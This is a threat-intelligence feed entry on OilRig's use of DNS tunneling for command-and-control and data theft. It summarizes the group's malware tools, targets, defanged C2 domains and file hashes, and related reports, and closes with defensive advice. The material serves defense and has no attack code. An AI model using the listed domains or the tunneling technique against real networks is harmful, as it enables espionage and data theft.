Threats Feed|OilRig|Last Updated 28/01/2026|AuthorCertfa Radar|Publish Date16/04/2019

Analyzing OilRig's Use of DNS Tunneling in Cyber Espionage Campaigns

  • Actor Motivations: Espionage,Exfiltration
  • Attack Vectors: Malware,Trojan
  • Attack Complexity: Medium
  • Threat Risk: High Impact/High Probability

Threat Overview

The report highlights OilRig’s deployment of tools like Helminth, ISMAgent, ALMACommunicator, BONDUPDATER, and QUADAGENT, which utilize DNS queries to communicate stealthily with C2 servers. This covert communication method is favored due to DNS's typical allowance through security devices. The group has evolved its DNS tunneling protocols over time, using customized subdomains and encoding techniques to transmit data and evade detection effectively.

Reference and Credit: Palo Alto Network - April 2019

DNS Tunneling in the Wild: Overview of OilRig’s DNS Tunneling

Detected Targets

TypeDescriptionConfidence
SectorGovernment Agencies and Services
Verified
RegionSaudi Arabia
Verified
RegionMiddle East Countries
Verified

Extracted IOCs

  • acrobatverify[.]com
  • go0gie[.]com
  • ntpupdateserver[.]com
  • poison-frog[.]club
  • prosalar[.]com
  • withyourface[.]com
  • 089bf971e8839db818ac462f53f82daed523c413bfc2e01fb76dd70b37162afe
  • 0ec288ac8c4aa045a45526c2939dbd843391c9c75fa4a3bcc0a6d7dc692fdcd1
  • 1b2fee00d28782076178a63e669d2306c37ba0c417708d4dc1f751765c3f94e1
  • 1f6369b42a76d02f32558912b57ede4f5ff0a90b18d3b96a4fe24120fa2c300c
  • 3986d54b00647b507b2afd708b7a1ce4c37027fb77d67c6bc3c20c3ac1a88ca4
  • 4b5112f0fb64825b879b01d686e8f4d43521252a3b4f4026c9d1d76d3f15b281
  • 52366b9ab2eb1d77ca6719a40f4779eb302dca97a832bd447abf10512dc51ed9
  • 662c53e69b66d62a4822e666031fd441bbdfa741e20d4511c6741ec3cb02475f
  • 7cbad6b3f505a199d6766a86b41ed23786bbb99dab9cae6c18936afdc2512f00
  • a9f1375da973b229eb649dc3c07484ae7513032b79665efe78c0e55a6e716821
  • d5c1822a36f2e7107d0d4c005c26978d00bcb34a587bd9ccf11ae7761ec73fb7
  • d808f3109822c185f1d8e1bf7ef7781c219dc56f5906478651748f0ace489d34
  • de620a0511d14a2fbc9b225ebfda550973d956ab4dec7e460a42e9d2d3cf0588
  • e52b8b0e8225befec156b355b3022faf5617542b82aa54f9f42088aa05a4ec49
  • f37b1bbf5a07759f10e0298b861b354cee13f325bc76fbddfaacd1ea7505e111
  • f5a64de9087b138608ccf036b067d91a47302259269fb05b3349964ca4060e7e
download

Tip: 22 related IOCs (0 IP, 6 domain, 0 URL, 0 email, 16 file hash) to this threat have been found.

Overlaps

OilRigOilRig's Cyber Tactics: Targeting Middle East Sectors with Stealthy Attacks

Source: Picus Security - December 2024

Detection (one case): 1f6369b42a76d02f32558912b57ede4f5ff0a90b18d3b96a4fe24120fa2c300c

OilRigOilRig's Poison Frog: From PowerShell Backdoors to Cisco AnyConnect Disguises

Source: Kaspersky - December 2019

Detection (one case): poison-frog[.]club

GreenbugDecoding Greenbug Group's Command and Control Communications via DNS Tunneling

Source: DomainTools - December 2019

Detection (one case): ntpupdateserver[.]com

OilRigOilRig's Use of BONDUPDATER: A Stealthy Cyber Espionage Campaign on Bahrain

Source: Netscout - September 2019

Detection (one case): withyourface[.]com

OilRigUncovering OilRig’s Malware Testing Ops for Targeted Attacks in the Middle East

Source: Palo Alto Networks - November 2018

Detection (two cases): 7cbad6b3f505a199d6766a86b41ed23786bbb99dab9cae6c18936afdc2512f00, withyourface[.]com

OilRigOilRig Continues Assault on Middle Eastern Governments and Businesses with BONDUPDATER

Source: Palo Alto Network - September 2018

Detection (three cases): 7cbad6b3f505a199d6766a86b41ed23786bbb99dab9cae6c18936afdc2512f00, d5c1822a36f2e7107d0d4c005c26978d00bcb34a587bd9ccf11ae7761ec73fb7, withyourface[.]com

OilRigAdapting and Evolving: A Look at the OilRig's QUADAGENT-Driven Attacks

Source: Palo Alto Networks - July 2018

Detection (two cases): 1f6369b42a76d02f32558912b57ede4f5ff0a90b18d3b96a4fe24120fa2c300c, acrobatverify[.]com

APT34APT34's Enhanced Cyber Espionage: BONDUPDATER and POWRUNER Malware Variants Unveiled

Source: Booz Allen - February 2018

Detection (one case): poison-frog[.]club

OilRigOilRig Threat Group Introduces ALMA Communicator in Spear-Phishing Attacks

Source: Palo Alto Networks - November 2017

Detection (two cases): f37b1bbf5a07759f10e0298b861b354cee13f325bc76fbddfaacd1ea7505e111, prosalar[.]com

GreenbugPotential Cyber Targets Revealed in Greenbug's Domain Registrations: Israeli and Saudi Firms in Focus

Source: ClearSky - October 2017

Detection (one case): ntpupdateserver[.]com

OilRigInside OilRig's Attack on UAE Government: ISMInjector and CVE-2017-0199 Exploit in Play

Source: Palo Alto Networks - October 2017

Detection (two cases): a9f1375da973b229eb649dc3c07484ae7513032b79665efe78c0e55a6e716821, ntpupdateserver[.]com

OilRigOilRig and Greenbug Connection: Expanding Threats with Modified Trojans

Source: Palo Alto Network - July 2017

Detection (two cases): 52366b9ab2eb1d77ca6719a40f4779eb302dca97a832bd447abf10512dc51ed9, ntpupdateserver[.]com

OilRigOilRig Campaign: Malware Updates and Expanded Global Targets

Source: Palo Alto Networks - October 2016

Detection (nine cases): 089bf971e8839db818ac462f53f82daed523c413bfc2e01fb76dd70b37162afe, 0ec288ac8c4aa045a45526c2939dbd843391c9c75fa4a3bcc0a6d7dc692fdcd1, 1b2fee00d28782076178a63e669d2306c37ba0c417708d4dc1f751765c3f94e1, 3986d54b00647b507b2afd708b7a1ce4c37027fb77d67c6bc3c20c3ac1a88ca4, 4b5112f0fb64825b879b01d686e8f4d43521252a3b4f4026c9d1d76d3f15b281, 662c53e69b66d62a4822e666031fd441bbdfa741e20d4511c6741ec3cb02475f, d808f3109822c185f1d8e1bf7ef7781c219dc56f5906478651748f0ace489d34, f5a64de9087b138608ccf036b067d91a47302259269fb05b3349964ca4060e7e, go0gie[.]com

OilRigOilRig Group Unleashes Coordinated Cyber Campaigns on Saudi Arabian Industries

Source: Palo Alto Networks - May 2016

Detection (one case): go0gie[.]com

APT34APT34 Targets Middle Eastern Banks with Macro Malware

Source: Mandiant - May 2016

Detection (one case): go0gie[.]com

Hint: Overlaps are extracted automatically by examining the IOCs associated with all indexed threats and actors.

FAQs

Understanding OilRig’s DNS Tunneling Operations

A threat group known as OilRig has been using custom-built malware that leverages DNS tunneling to secretly communicate with their servers, allowing them to control infected systems and steal data.

The attacks were conducted by OilRig, a group active since at least 2016, known for targeting organizations primarily in the Middle East.

The goal was to maintain covert access to compromised systems, exfiltrate sensitive data, and deliver follow-on payloads through persistent DNS-based channels.

While the operations are sophisticated and targeted, OilRig has repeatedly updated their tools and techniques, indicating sustained campaigns against multiple organizations over several years.

The documented campaigns included attacks on government entities, technology providers, and organizations in the Middle East.

The malware sends specially crafted DNS queries to actor-controlled domains, embedding encoded data within those queries and interpreting DNS responses as instructions or additional payloads.

DNS is often overlooked in security monitoring and permitted through firewalls, making it an effective way to bypass traditional network defenses and maintain stealthy communication.

Monitor DNS traffic for anomalies, block suspicious domains, update endpoint defenses, and train employees to recognize phishing attempts.

This is primarily a targeted threat aimed at specific organizations, but the techniques could be adapted for broader use if not adequately mitigated.

About Affiliation
OilRig
View OilRig's Insights